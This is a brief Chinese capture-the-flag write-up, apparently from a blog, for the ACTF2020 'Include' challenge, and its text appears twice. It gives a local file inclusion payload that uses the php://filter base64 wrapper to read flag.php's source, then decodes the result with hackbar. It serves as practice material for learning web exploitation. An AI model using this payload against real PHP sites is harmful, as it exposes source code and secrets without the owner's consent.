文件包含,使用PHP伪协议读取就行
payload:?file=php://filter/read=convert.base64-encode/resource=flag.php
使用hackbar进行base64解码得到flag
文件包含,使用PHP伪协议读取就行
payload:?file=php://filter/read=convert.base64-encode/resource=flag.php
使用hackbar进行base64解码得到flag
[ACTF2020 新生赛]Include
https://www.bnessy.com/archives/actf2020xin-sheng-sai-include